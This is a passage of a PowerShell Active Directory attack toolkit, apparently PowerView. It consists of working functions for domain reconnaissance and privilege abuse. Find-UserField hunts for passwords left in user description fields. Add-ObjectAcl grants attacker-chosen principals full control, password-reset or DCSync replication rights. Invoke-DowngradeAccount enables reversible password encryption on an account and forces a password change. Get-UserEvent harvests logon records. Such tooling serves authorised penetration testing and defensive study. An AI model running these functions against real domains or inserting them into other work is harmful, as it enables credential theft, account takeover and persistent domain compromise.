Get-NetUser -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential | Select-Object -Property $Properties } else { # extract out just the property names Get-NetUser -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential | Select-Object -First 1 | Get-Member -MemberType *Property | Select-Object -Property 'Name' } } filter Find-UserField { <# .SYNOPSIS Searches user object fields for a given word (default *pass*). Default field being searched is 'description'. Taken directly from @obscuresec's post: http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html .PARAMETER SearchTerm Term to search for, default of "pass". .PARAMETER SearchField User field to search, default of "description". .PARAMETER ADSpath The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER Domain Domain to search computer fields for, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Find-UserField -SearchField info -SearchTerm backup Find user accounts with "backup" in the "info" field. #> [CmdletBinding()] param( [Parameter(Position=0,ValueFromPipeline=$True)] [String] $SearchTerm = 'pass', [String] $SearchField = 'description', [String] $ADSpath, [String] $Domain, [String] $DomainController, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) Get-NetUser -ADSpath $ADSpath -Domain $Domain -DomainController $DomainController -Credential $Credential -Filter "($SearchField=*$SearchTerm*)" -PageSize $PageSize | Select-Object samaccountname,$SearchField } filter Get-UserEvent { <# .SYNOPSIS Dump and parse security events relating to an account logon (ID 4624) or a TGT request event (ID 4768). Intended to be used and tested on Windows 2008 Domain Controllers. Admin Reqd? YES Author: @sixdub .PARAMETER ComputerName The computer to get events from. Default: Localhost .PARAMETER EventType Either 'logon', 'tgt', or 'all'. Defaults: 'logon' .PARAMETER DateStart Filter out all events before this date. Default: 5 days .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-UserEvent -ComputerName DomainController.testlab.local .LINK http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/ #> Param( [Parameter(ValueFromPipeline=$True)] [String] $ComputerName = $Env:ComputerName, [String] [ValidateSet("logon","tgt","all")] $EventType = "logon", [DateTime] $DateStart = [DateTime]::Today.AddDays(-5), [Management.Automation.PSCredential] $Credential ) if($EventType.ToLower() -like "logon") { [Int32[]]$ID = @(4624) } elseif($EventType.ToLower() -like "tgt") { [Int32[]]$ID = @(4768) } else { [Int32[]]$ID = @(4624, 4768) } if($Credential) { Write-Verbose "Using alternative credentials" $Arguments = @{ 'ComputerName' = $ComputerName; 'Credential' = $Credential; 'FilterHashTable' = @{ LogName = 'Security'; ID=$ID; StartTime=$DateStart}; 'ErrorAction' = 'SilentlyContinue'; } } else { $Arguments = @{ 'ComputerName' = $ComputerName; 'FilterHashTable' = @{ LogName = 'Security'; ID=$ID; StartTime=$DateStart}; 'ErrorAction' = 'SilentlyContinue'; } } # grab all events matching our filter for the specified host Get-WinEvent @Arguments | ForEach-Object { if($ID -contains 4624) { # first parse and check the logon event type. This could be later adapted and tested for RDP logons (type 10) if($_.message -match '(?s)(?<=Logon Type:).*?(?=(Impersonation Level:|New Logon:))') { if($Matches) { $LogonType = $Matches[0].trim() $Matches = $Null } } else { $LogonType = "" } # interactive logons or domain logons if (($LogonType -eq 2) -or ($LogonType -eq 3)) { try { # parse and store the account used and the address they came from if($_.message -match '(?s)(?<=New Logon:).*?(?=Process Information:)') { if($Matches) { $UserName = $Matches[0].split("`n")[2].split(":")[1].trim() $Domain = $Matches[0].split("`n")[3].split(":")[1].trim() $Matches = $Null } } if($_.message -match '(?s)(?<=Network Information:).*?(?=Source Port:)') { if($Matches) { $Address = $Matches[0].split("`n")[2].split(":")[1].trim() $Matches = $Null } } # only add if there was account information not for a machine or anonymous logon if ($UserName -and (-not $UserName.endsWith('$')) -and ($UserName -ne 'ANONYMOUS LOGON')) { $LogonEventProperties = @{ 'Domain' = $Domain 'ComputerName' = $ComputerName 'Username' = $UserName 'Address' = $Address 'ID' = '4624' 'LogonType' = $LogonType 'Time' = $_.TimeCreated } New-Object -TypeName PSObject -Property $LogonEventProperties } } catch { Write-Verbose "Error parsing event logs: $_" } } } if($ID -contains 4768) { # the TGT event type try { if($_.message -match '(?s)(?<=Account Information:).*?(?=Service Information:)') { if($Matches) { $Username = $Matches[0].split("`n")[1].split(":")[1].trim() $Domain = $Matches[0].split("`n")[2].split(":")[1].trim() $Matches = $Null } } if($_.message -match '(?s)(?<=Network Information:).*?(?=Additional Information:)') { if($Matches) { $Address = $Matches[0].split("`n")[1].split(":")[-1].trim() $Matches = $Null } } $LogonEventProperties = @{ 'Domain' = $Domain 'ComputerName' = $ComputerName 'Username' = $UserName 'Address' = $Address 'ID' = '4768' 'LogonType' = '' 'Time' = $_.TimeCreated } New-Object -TypeName PSObject -Property $LogonEventProperties } catch { Write-Verbose "Error parsing event logs: $_" } } } } function Get-ObjectAcl { <# .SYNOPSIS Returns the ACLs associated with a specific active directory object. Thanks Sean Metcalf (@pyrotek3) for the idea and guidance. .PARAMETER SamAccountName Object name to filter for. .PARAMETER Name Object name to filter for. .PARAMETER DistinguishedName Object distinguished name to filter for. .PARAMETER ResolveGUIDs Switch. Resolve GUIDs to their display names. .PARAMETER Filter A customized ldap filter string to use, e.g. "(description=*admin*)" .PARAMETER ADSpath The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER ADSprefix Prefix to set for the searcher (like "CN=Sites,CN=Configuration") .PARAMETER RightsFilter Only return results with the associated rights, "All", "ResetPassword","WriteMembers" .PARAMETER Domain The domain to use for the query, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .EXAMPLE PS C:\> Get-ObjectAcl -SamAccountName matt.admin -domain testlab.local Get the ACLs for the matt.admin user in the testlab.local domain .EXAMPLE PS C:\> Get-ObjectAcl -SamAccountName matt.admin -domain testlab.local -ResolveGUIDs Get the ACLs for the matt.admin user in the testlab.local domain and resolve relevant GUIDs to their display names. .EXAMPLE PS C:\> Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs Enumerate the ACL permissions for all OUs in the domain. #> [CmdletBinding()] Param ( [Parameter(ValueFromPipelineByPropertyName=$True)] [String] $SamAccountName, [Parameter(ValueFromPipelineByPropertyName=$True)] [String] $Name = "*", [Parameter(ValueFromPipelineByPropertyName=$True)] [String] $DistinguishedName = "*", [Switch] $ResolveGUIDs, [String] $Filter, [String] $ADSpath, [String] $ADSprefix, [String] [ValidateSet("All","ResetPassword","WriteMembers")] $RightsFilter, [String] $Domain, [String] $DomainController, [ValidateRange(1,10000)] [Int] $PageSize = 200 ) begin { $Searcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -ADSprefix $ADSprefix -PageSize $PageSize # get a GUID -> name mapping if($ResolveGUIDs) { $GUIDs = Get-GUIDMap -Domain $Domain -DomainController $DomainController -PageSize $PageSize } } process { if ($Searcher) { if($SamAccountName) { $Searcher.filter="(&(samaccountname=$SamAccountName)(name=$Name)(distinguishedname=$DistinguishedName)$Filter)" } else { $Searcher.filter="(&(name=$Name)(distinguishedname=$DistinguishedName)$Filter)" } try { $Results = $Searcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { $Object = [adsi]($_.path) if($Object.distinguishedname) { $Access = $Object.PsBase.ObjectSecurity.access $Access | ForEach-Object { $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0] if($Object.objectsid[0]){ $S = (New-Object System.Security.Principal.SecurityIdentifier($Object.objectsid[0],0)).Value } else { $S = $Null } $_ | Add-Member NoteProperty 'ObjectSID' $S $_ } } } | ForEach-Object { if($RightsFilter) { $GuidFilter = Switch ($RightsFilter) { "ResetPassword" { "00299570-246d-11d0-a768-00aa006e0529" } "WriteMembers" { "bf9679c0-0de6-11d0-a285-00aa003049e2" } Default { "00000000-0000-0000-0000-000000000000"} } if($_.ObjectType -eq $GuidFilter) { $_ } } else { $_ } } | ForEach-Object { if($GUIDs) { # if we're resolving GUIDs, map them them to the resolved hash table $AclProperties = @{} $_.psobject.properties | ForEach-Object { if( ($_.Name -eq 'ObjectType') -or ($_.Name -eq 'InheritedObjectType') ) { try { $AclProperties[$_.Name] = $GUIDS[$_.Value.toString()] } catch { $AclProperties[$_.Name] = $_.Value } } else { $AclProperties[$_.Name] = $_.Value } } New-Object -TypeName PSObject -Property $AclProperties } else { $_ } } $Results.dispose() $Searcher.dispose() } catch { Write-Warning $_ } } } } function Add-ObjectAcl { <# .SYNOPSIS Adds an ACL for a specific active directory object. AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3) https://adsecurity.org/?p=1906 ACE setting method adapted from https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects. 'ResetPassword' doesn't need to know the user's current password 'WriteMembers' allows for the modification of group membership .PARAMETER TargetSamAccountName Target object name to filter for. .PARAMETER TargetName Target object name to filter for. .PARAMETER TargetDistinguishedName Target object distinguished name to filter for. .PARAMETER TargetFilter A customized ldap filter string to use to find a target, e.g. "(description=*admin*)" .PARAMETER TargetADSpath The LDAP source for the target, e.g. "LDAP://OU=secret,DC=testlab,DC=local" .PARAMETER TargetADSprefix Prefix to set for the target searcher (like "CN=Sites,CN=Configuration") .PARAMETER PrincipalSID The SID of the principal object to add for access. .PARAMETER PrincipalName The name of the principal object to add for access. .PARAMETER PrincipalSamAccountName The samAccountName of the principal object to add for access. .PARAMETER Rights Rights to add for the principal, "All","ResetPassword","WriteMembers","DCSync" .PARAMETER Domain The domain to use for the target query, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .EXAMPLE Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName john Grants 'john' all full access rights to the 'matt' account. .EXAMPLE Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName john -Rights ResetPassword Grants 'john' the right to reset the password for the 'matt' account. .LINK https://adsecurity.org/?p=1906 https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell #> [CmdletBinding()] Param ( [String] $TargetSamAccountName, [String] $TargetName = "*", [Alias('DN')] [String] $TargetDistinguishedName = "*", [String] $TargetFilter, [String] $TargetADSpath, [String] $TargetADSprefix, [String] [ValidatePattern('^S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+')] $PrincipalSID, [String] $PrincipalName, [String] $PrincipalSamAccountName, [String] [ValidateSet("All","ResetPassword","WriteMembers","DCSync")] $Rights = "All", [String] $RightsGUID, [String] $Domain, [String] $DomainController, [ValidateRange(1,10000)] [Int] $PageSize = 200 ) begin { $Searcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -ADSpath $TargetADSpath -ADSprefix $TargetADSprefix -PageSize $PageSize if($PrincipalSID) { $ResolvedPrincipalSID = $PrincipalSID } else { $Principal = Get-ADObject -Domain $Domain -DomainController $DomainController -Name $PrincipalName -SamAccountName $PrincipalSamAccountName -PageSize $PageSize if(!$Principal) { throw "Error resolving principal" } $ResolvedPrincipalSID = $Principal.objectsid } if(!$ResolvedPrincipalSID) { throw "Error resolving principal" } } process { if ($Searcher) { if($TargetSamAccountName) { $Searcher.filter="(&(samaccountname=$TargetSamAccountName)(name=$TargetName)(distinguishedname=$TargetDistinguishedName)$TargetFilter)" } else { $Searcher.filter="(&(name=$TargetName)(distinguishedname=$TargetDistinguishedName)$TargetFilter)" } try { $Results = $Searcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { # adapted from https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects $TargetDN = $_.Properties.distinguishedname $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$ResolvedPrincipalSID) $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None" $ControlType = [System.Security.AccessControl.AccessControlType] "Allow" $ACEs = @() if($RightsGUID) { $GUIDs = @($RightsGUID) } else { $GUIDs = Switch ($Rights) { # ResetPassword doesn't need to know the user's current password "ResetPassword" { "00299570-246d-11d0-a768-00aa006e0529" } # allows for the modification of group membership "WriteMembers" { "bf9679c0-0de6-11d0-a285-00aa003049e2" } # 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 # 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 # 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c # when applied to a domain's ACL, allows for the use of DCSync "DCSync" { "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2", "89e95b76-444d-4c62-991a-0facbeda640c"} } } if($GUIDs) { foreach($GUID in $GUIDs) { $NewGUID = New-Object Guid $GUID $ADRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight" $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity,$ADRights,$ControlType,$NewGUID,$InheritanceType } } else { # deault to GenericAll rights $ADRights = [System.DirectoryServices.ActiveDirectoryRights] "GenericAll" $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity,$ADRights,$ControlType,$InheritanceType } Write-Verbose "Granting principal $ResolvedPrincipalSID '$Rights' on $($_.Properties.distinguishedname)" try { # add all the new ACEs to the specified object ForEach ($ACE in $ACEs) { Write-Verbose "Granting principal $ResolvedPrincipalSID '$($ACE.ObjectType)' rights on $($_.Properties.distinguishedname)" $Object = [adsi]($_.path) $Object.PsBase.ObjectSecurity.AddAccessRule($ACE) $Object.PsBase.commitchanges() } } catch { Write-Warning "Error granting principal $ResolvedPrincipalSID '$Rights' on $TargetDN : $_" } } $Results.dispose() $Searcher.dispose() } catch { Write-Warning "Error: $_" } } } } function Invoke-ACLScanner { <# .SYNOPSIS Searches for ACLs for specifable AD objects (default to all domain objects) with a domain sid of > -1000, and have modifiable rights. Thanks Sean Metcalf (@pyrotek3) for the idea and guidance. .PARAMETER SamAccountName Object name to filter for. .PARAMETER Name Object name to filter for. .PARAMETER DistinguishedName Object distinguished name to filter for. .PARAMETER Filter A customized ldap filter string to use, e.g. "(description=*admin*)" .PARAMETER ADSpath The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER ADSprefix Prefix to set for the searcher (like "CN=Sites,CN=Configuration") .PARAMETER Domain The domain to use for the query, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ResolveGUIDs Switch. Resolve GUIDs to their display names. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .EXAMPLE PS C:\> Invoke-ACLScanner -ResolveGUIDs | Export-CSV -NoTypeInformation acls.csv Enumerate all modifable ACLs in the current domain, resolving GUIDs to display names, and export everything to a .csv #> [CmdletBinding()] Param ( [Parameter(ValueFromPipeline=$True)] [String] $SamAccountName, [String] $Name = "*", [Alias('DN')] [String] $DistinguishedName = "*", [String] $Filter, [String] $ADSpath, [String] $ADSprefix, [String] $Domain, [String] $DomainController, [Switch] $ResolveGUIDs, [ValidateRange(1,10000)] [Int] $PageSize = 200 ) # Get all domain ACLs with the appropriate parameters Get-ObjectACL @PSBoundParameters | ForEach-Object { # add in the translated SID for the object identity $_ | Add-Member Noteproperty 'IdentitySID' ($_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value) $_ } | Where-Object { # check for any ACLs with SIDs > -1000 try { # TODO: change this to a regex for speedup? [int]($_.IdentitySid.split("-")[-1]) -ge 1000 } catch {} } | Where-Object { # filter for modifiable rights ($_.ActiveDirectoryRights -eq "GenericAll") -or ($_.ActiveDirectoryRights -match "Write") -or ($_.ActiveDirectoryRights -match "Create") -or ($_.ActiveDirectoryRights -match "Delete") -or (($_.ActiveDirectoryRights -match "ExtendedRight") -and ($_.AccessControlType -eq "Allow")) } } filter Get-GUIDMap { <# .SYNOPSIS Helper to build a hash table of [GUID] -> resolved names Heavily adapted from http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx .PARAMETER Domain The domain to use for the query, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .LINK http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx #> [CmdletBinding()] Param ( [Parameter(ValueFromPipeline=$True)] [String] $Domain, [String] $DomainController, [ValidateRange(1,10000)] [Int] $PageSize = 200 ) $GUIDs = @{'00000000-0000-0000-0000-000000000000' = 'All'} $SchemaPath = (Get-NetForest).schema.name $SchemaSearcher = Get-DomainSearcher -ADSpath $SchemaPath -DomainController $DomainController -PageSize $PageSize if($SchemaSearcher) { $SchemaSearcher.filter = "(schemaIDGUID=*)" try { $Results = $SchemaSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { # convert the GUID $GUIDs[(New-Object Guid (,$_.properties.schemaidguid[0])).Guid] = $_.properties.name[0] } $Results.dispose() $SchemaSearcher.dispose() } catch { Write-Verbose "Error in building GUID map: $_" } } $RightsSearcher = Get-DomainSearcher -ADSpath $SchemaPath.replace("Schema","Extended-Rights") -DomainController $DomainController -PageSize $PageSize -Credential $Credential if ($RightsSearcher) { $RightsSearcher.filter = "(objectClass=controlAccessRight)" try { $Results = $RightsSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { # convert the GUID $GUIDs[$_.properties.rightsguid[0].toString()] = $_.properties.name[0] } $Results.dispose() $RightsSearcher.dispose() } catch { Write-Verbose "Error in building GUID map: $_" } } $GUIDs } function Get-NetComputer { <# .SYNOPSIS This function utilizes adsisearcher to query the current AD context for current computer objects. Based off of Carlos Perez's Audit.psm1 script in Posh-SecMod (link below). .PARAMETER ComputerName Return computers with a specific name, wildcards accepted. .PARAMETER SPN Return computers with a specific service principal name, wildcards accepted. .PARAMETER OperatingSystem Return computers with a specific operating system, wildcards accepted. .PARAMETER ServicePack Return computers with a specific service pack, wildcards accepted. .PARAMETER Filter A customized ldap filter string to use, e.g. "(description=*admin*)" .PARAMETER Printers Switch. Return only printers. .PARAMETER Ping Switch. Ping each host to ensure it's up before enumerating. .PARAMETER FullData Switch. Return full computer objects instead of just system names (the default). .PARAMETER Domain The domain to query for computers, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ADSpath The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER SiteName The AD Site name to search for computers. .PARAMETER Unconstrained Switch. Return computer objects that have unconstrained delegation. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-NetComputer Returns the current computers in current domain. .EXAMPLE PS C:\> Get-NetComputer -SPN mssql* Returns all MS SQL servers on the domain. .EXAMPLE PS C:\> Get-NetComputer -Domain testing Returns the current computers in 'testing' domain. .EXAMPLE PS C:\> Get-NetComputer -Domain testing -FullData Returns full computer objects in the 'testing' domain. .LINK https://github.com/darkoperator/Posh-SecMod/blob/master/Audit/Audit.psm1 #> [CmdletBinding()] Param ( [Parameter(ValueFromPipeline=$True)] [Alias('HostName')] [String] $ComputerName = '*', [String] $SPN, [String] $OperatingSystem, [String] $ServicePack, [String] $Filter, [Switch] $Printers, [Switch] $Ping, [Switch] $FullData, [String] $Domain, [String] $DomainController, [String] $ADSpath, [String] $SiteName, [Switch] $Unconstrained, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) begin { # so this isn't repeated if multiple computer names are passed on the pipeline $CompSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -PageSize $PageSize -Credential $Credential } process { if ($CompSearcher) { # if we're checking for unconstrained delegation if($Unconstrained) { Write-Verbose "Searching for computers with for unconstrained delegation" $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=524288)" } # set the filters for the seracher if it exists if($Printers) { Write-Verbose "Searching for printers" # $CompSearcher.filter="(&(objectCategory=printQueue)$Filter)" $Filter += "(objectCategory=printQueue)" } if($SPN) { Write-Verbose "Searching for computers with SPN: $SPN" $Filter += "(servicePrincipalName=$SPN)" } if($OperatingSystem) { $Filter += "(operatingsystem=$OperatingSystem)" } if($ServicePack) { $Filter += "(operatingsystemservicepack=$ServicePack)" } if($SiteName) { $Filter += "(serverreferencebl=$SiteName)" } $CompFilter = "(&(sAMAccountType=805306369)(dnshostname=$ComputerName)$Filter)" Write-Verbose "Get-NetComputer filter : '$CompFilter'" $CompSearcher.filter = $CompFilter try { $Results = $CompSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { $Up = $True if($Ping) { # TODO: how can these results be piped to ping for a speedup? $Up = Test-Connection -Count 1 -Quiet -ComputerName $_.properties.dnshostname } if($Up) { # return full data objects if ($FullData) { # convert/process the LDAP fields for each result $Computer = Convert-LDAPProperty -Properties $_.Properties $Computer.PSObject.TypeNames.Add('PowerView.Computer') $Computer } else { # otherwise we're just returning the DNS host name $_.properties.dnshostname } } } $Results.dispose() $CompSearcher.dispose() } catch { Write-Warning "Error: $_" } } } } function Get-ADObject { <# .SYNOPSIS Takes a domain SID and returns the user, group, or computer object associated with it. .PARAMETER SID The SID of the domain object you're querying for. .PARAMETER Name The Name of the domain object you're querying for. .PARAMETER SamAccountName The SamAccountName of the domain object you're querying for. .PARAMETER Domain The domain to query for objects, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ADSpath The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER Filter Additional LDAP filter string for the query. .PARAMETER ReturnRaw Switch. Return the raw object instead of translating its properties. Used by Set-ADObject to modify object properties. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-ADObject -SID "S-1-5-21-2620891829-2411261497-1773853088-1110" Get the domain object associated with the specified SID. .EXAMPLE PS C:\> Get-ADObject -ADSpath "CN=AdminSDHolder,CN=System,DC=testlab,DC=local" Get the AdminSDHolder object for the testlab.local domain. #> [CmdletBinding()] Param ( [Parameter(ValueFromPipeline=$True)] [String] $SID, [String] $Name, [String] $SamAccountName, [String] $Domain, [String] $DomainController, [String] $ADSpath, [String] $Filter, [Switch] $ReturnRaw, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) process { if($SID) { # if a SID is passed, try to resolve it to a reachable domain name for the searcher try { $Name = Convert-SidToName $SID if($Name) { $Canonical = Convert-ADName -ObjectName $Name -InputType NT4 -OutputType Canonical if($Canonical) { $Domain = $Canonical.split("/")[0] } else { Write-Warning "Error resolving SID '$SID'" return $Null } } } catch { Write-Warning "Error resolving SID '$SID' : $_" return $Null } } $ObjectSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize if($ObjectSearcher) { if($SID) { $ObjectSearcher.filter = "(&(objectsid=$SID)$Filter)" } elseif($Name) { $ObjectSearcher.filter = "(&(name=$Name)$Filter)" } elseif($SamAccountName) { $ObjectSearcher.filter = "(&(samAccountName=$SamAccountName)$Filter)" } $Results = $ObjectSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { if($ReturnRaw) { $_ } else { # convert/process the LDAP fields for each result Convert-LDAPProperty -Properties $_.Properties } } $Results.dispose() $ObjectSearcher.dispose() } } } function Set-ADObject { <# .SYNOPSIS Takes a SID, name, or SamAccountName to query for a specified domain object, and then sets a specified 'PropertyName' to a specified 'PropertyValue'. .PARAMETER SID The SID of the domain object you're querying for. .PARAMETER Name The Name of the domain object you're querying for. .PARAMETER SamAccountName The SamAccountName of the domain object you're querying for. .PARAMETER Domain The domain to query for objects, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER Filter Additional LDAP filter string for the query. .PARAMETER PropertyName The property name to set. .PARAMETER PropertyValue The value to set for PropertyName .PARAMETER PropertyXorValue Integer value to binary xor (-bxor) with the current int value. .PARAMETER ClearValue Switch. Clear the value of PropertyName .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Set-ADObject -SamAccountName matt.admin -PropertyName countrycode -PropertyValue 0 Set the countrycode for matt.admin to 0 .EXAMPLE PS C:\> Set-ADObject -SamAccountName matt.admin -PropertyName useraccountcontrol -PropertyXorValue 65536 Set the password not to expire on matt.admin #> [CmdletBinding()] Param ( [String] $SID, [String] $Name, [String] $SamAccountName, [String] $Domain, [String] $DomainController, [String] $Filter, [Parameter(Mandatory = $True)] [String] $PropertyName, $PropertyValue, [Int] $PropertyXorValue, [Switch] $ClearValue, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) $Arguments = @{ 'SID' = $SID 'Name' = $Name 'SamAccountName' = $SamAccountName 'Domain' = $Domain 'DomainController' = $DomainController 'Filter' = $Filter 'PageSize' = $PageSize 'Credential' = $Credential } # splat the appropriate arguments to Get-ADObject $RawObject = Get-ADObject -ReturnRaw @Arguments try { # get the modifiable object for this search result $Entry = $RawObject.GetDirectoryEntry() if($ClearValue) { Write-Verbose "Clearing value" $Entry.$PropertyName.clear() $Entry.commitchanges() } elseif($PropertyXorValue) { $TypeName = $Entry.$PropertyName[0].GetType().name # UAC value references- https://support.microsoft.com/en-us/kb/305144 $PropertyValue = $($Entry.$PropertyName) -bxor $PropertyXorValue $Entry.$PropertyName = $PropertyValue -as $TypeName $Entry.commitchanges() } else { $Entry.put($PropertyName, $PropertyValue) $Entry.setinfo() } } catch { Write-Warning "Error setting property $PropertyName to value '$PropertyValue' for object $($RawObject.Properties.samaccountname) : $_" } } function Invoke-DowngradeAccount { <# .SYNOPSIS Set reversible encryption on a given account and then force the password to be set on next user login. To repair use "-Repair". .PARAMETER SamAccountName The SamAccountName of the domain object you're querying for. .PARAMETER Name The Name of the domain object you're querying for. .PARAMETER Domain The domain to query for objects, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER Filter Additional LDAP filter string for the query. .PARAMETER Repair Switch. Unset the reversible encryption flag and force password reset flag. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS> Invoke-DowngradeAccount -SamAccountName jason Set reversible encryption on the 'jason' account and force the password to be changed. .EXAMPLE PS> Invoke-DowngradeAccount -SamAccountName jason -Repair Unset reversible encryption on the 'jason' account and remove the forced password change. #> [CmdletBinding()] Param ( [Parameter(ParameterSetName = 'SamAccountName', Position=0, ValueFromPipeline=$True)] [String] $SamAccountName, [Parameter(ParameterSetName = 'Name')] [String] $Name, [String] $Domain, [String] $DomainController, [String] $Filter, [Switch] $Repair, [Management.Automation.PSCredential] $Credential ) process { $Arguments = @{ 'SamAccountName' = $SamAccountName 'Name' = $Name 'Domain' = $Domain 'DomainController' = $DomainController 'Filter' = $Filter 'Credential' = $Credential } # splat the appropriate arguments to Get-ADObject $UACValues = Get-ADObject @Arguments | select useraccountcontrol | ConvertFrom-UACValue if($Repair) { if($UACValues.Keys -contains "ENCRYPTED_TEXT_PWD_ALLOWED") { # if reversible encryption is set, unset it Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 128 } # unset the forced password change Set-ADObject @Arguments -PropertyName pwdlastset -PropertyValue -1 } else { if($UACValues.Keys -contains "DONT_EXPIRE_PASSWORD") { # if the password is set to never expire, unset Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 65536 } if($UACValues.Keys -notcontains "ENCRYPTED_TEXT_PWD_ALLOWED") { # if reversible encryption is not set, set it Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 128 } # force the password to be changed on next login Set-ADObject @Arguments -PropertyName pwdlastset -PropertyValue 0 } } } function Get-ComputerProperty { <# .SYNOPSIS Returns a list of all computer object properties. If a property name is specified, it returns all [computer:property] values. Taken directly from @obscuresec's post: http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html .PARAMETER Properties Return property names for computers. .PARAMETER Domain The domain to query for computer properties, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-ComputerProperty -Domain testing Returns all user properties for computers in the 'testing' domain. .EXAMPLE PS C:\> Get-ComputerProperty -Properties ssn,lastlogon,location Returns all an array of computer/ssn/lastlogin/location combinations for computers in the current domain. .LINK http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html #> [CmdletBinding()] param( [String[]] $Properties, [String] $Domain, [String] $DomainController, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) if($Properties) { # extract out the set of all properties for each object $Properties = ,"name" + $Properties | Sort-Object -Unique Get-NetComputer -Domain $Domain 